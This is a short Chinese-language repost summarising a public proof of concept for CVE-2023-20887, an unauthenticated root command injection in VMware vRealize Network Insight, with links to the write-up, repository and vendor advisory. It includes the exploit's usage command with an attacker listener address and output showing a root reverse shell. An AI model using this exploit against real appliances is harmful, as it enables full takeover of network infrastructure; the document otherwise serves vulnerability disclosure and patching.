关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)
2023-6-14 09:38:17 Author: Ots安全(查看原文) 阅读量:23 收藏
2023-6-14 09:38:17 Author: Ots安全(查看原文) 阅读量:23 收藏
CVE-2023-20887
CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) 未经身份验证的 RCE 的 POC
技术分析
该漏洞的根本原因分析可以在我的博客上找到:https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
概括
VMWare Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时容易受到命令注入的攻击。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受可以绕过的反向代理保护。VMware 已将此问题的严重性评估为处于严重严重性范围内,最高 CVSSv3 基本分数为 9.8。恶意行为者可以在设备的“root”上下文中远程执行代码。VMWare 6.x 版本易受攻击。
用法
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)(*) Starting handler(+) Received connection from 192.168.116.100(+) pop thy shell! (it's ready)sudo bashiduid=0(root) gid=0(root) groups=0(root)hostnamevrni-platform-release
缓解措施
更新到最新版本或按照进度咨询中的说明进行缓解
https://www.vmware.com/security/advisories/VMSA-2023-0012.html
项目地址:https://github.com/sinsinology/CVE-2023-20887
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247498643&idx=1&sn=3dfe6f89e6c87b649ebbae91e380d5c6&chksm=9badb2d8acda3bce3fdf69d188c37dbffc8d90fb601a614696d160932cee63b3fc1706b7de45#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh